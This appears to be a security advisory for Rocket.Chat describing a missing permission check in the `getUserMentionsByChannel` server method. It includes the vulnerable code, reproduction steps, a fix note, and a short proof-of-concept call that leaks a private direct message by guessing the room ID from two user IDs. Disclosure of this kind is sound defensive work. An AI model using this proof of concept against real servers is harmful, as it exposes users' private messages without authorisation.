getUserMentionsByChannel leaks messages with mention from private channel

## Summary The `getUserMentionsByChannel` meteor server method discloses messages from private channels and direct messages regardless of the users access permission to the room. ## Description When calling the `getUserMentionsByChannel` method, the server does not check the users access to the given room and returns all messages the user has been mentioned in. ```javascript Meteor.call( "getUserMentionsByChannel", { roomId: "<TARGET_ROOM>" }, console.log ); ``` The issue was found in [app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23](https://github.com/RocketChat/Rocket.Chat/blob/194a600f31a1037716ac4de297cfff0b8a4f9942/app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23) where roomId is verified to be a String only. ```javascript Meteor.methods({ getUserMentionsByChannel({ roomId, options }) { check(roomId, String); if (!Meteor.userId()) { throw new Meteor.Error('error-invalid-user', 'Invalid user', { method: 'getUserMentionsByChannel' }); } const room = Rooms.findOneById(roomId); if (!room) { throw new Meteor.Error('error-invalid-room', 'Invalid room', { method: 'getUserMentionsByChannel' }); } const user = Users.findOneById(Meteor.userId()); return Messages.findVisibleByMentionAndRoomId(user.username, roomId, options).fetch(); }, }); ``` The server will return all messages the requesting user has been @ mentioned in. ## Releases Affected: * `4.1.2` * `3.18.3` * First [99065f7518bc88341210c0e38678bc3c97e3b58a](https://github.com/RocketChat/Rocket.Chat/blob/99065f7518bc88341210c0e38678bc3c97e3b58a/packages/rocketchat-mentions/server/methods/getUserMentionsByChannel.js) (12.03.2018) ## Steps To Reproduce (from initial installation to vulnerability): 1. Login to Rocket.Chat 2. Obtain Room Id 1. Guess Direct Message roomId from User IDs 2. Leak private Message ID with unknown vulnerability 3. Call `getUserMentionsByChannel` with given `{ roomId: "<Value>" }` 4. Read messages where the own user was mentioned in console.log output ## Supporting Material/References: The following example leks a private message between two users to a third account `trudy` who performs the requests from the authenticated client disclosing a direct message between `alice` and `bob`. ```javascript Meteor.user().username // > 'trudy' let alice = 'kYfzDMQLyPFjS9ASb'; let bob = 'zZnrfd2RvcWhspr6S'; Meteor.call( "getUserMentionsByChannel", { roomId: `${alice}${bob} }, // direct message channel (err, data) => console.log( data .map((m) => `${m._id} ${m.u.username} (${m.ts.toGMTString()}): ${m.msg}`) .join("\n") ) ); // > Yp6NoMZk34mnQZiBR alice (Thu, 25 Nov 2021 14:17:25 UTC): Mention @trudy somewhere Meteor.call("getMessages", ["Yp6NoMZk34mnQZiBR"], (err, data) => console.log(err.message)) // > Not allowed [error-not-allowed] ``` ## Suggested mitigation * Check for permission to read messages from the room given in in `{ roomId }` method argument. ## Impact Authenticated users can disclose all messages they were mentioned in from private channels and direct messages they should not have access to. ## Fixed in We have fix this issue in version 5.0>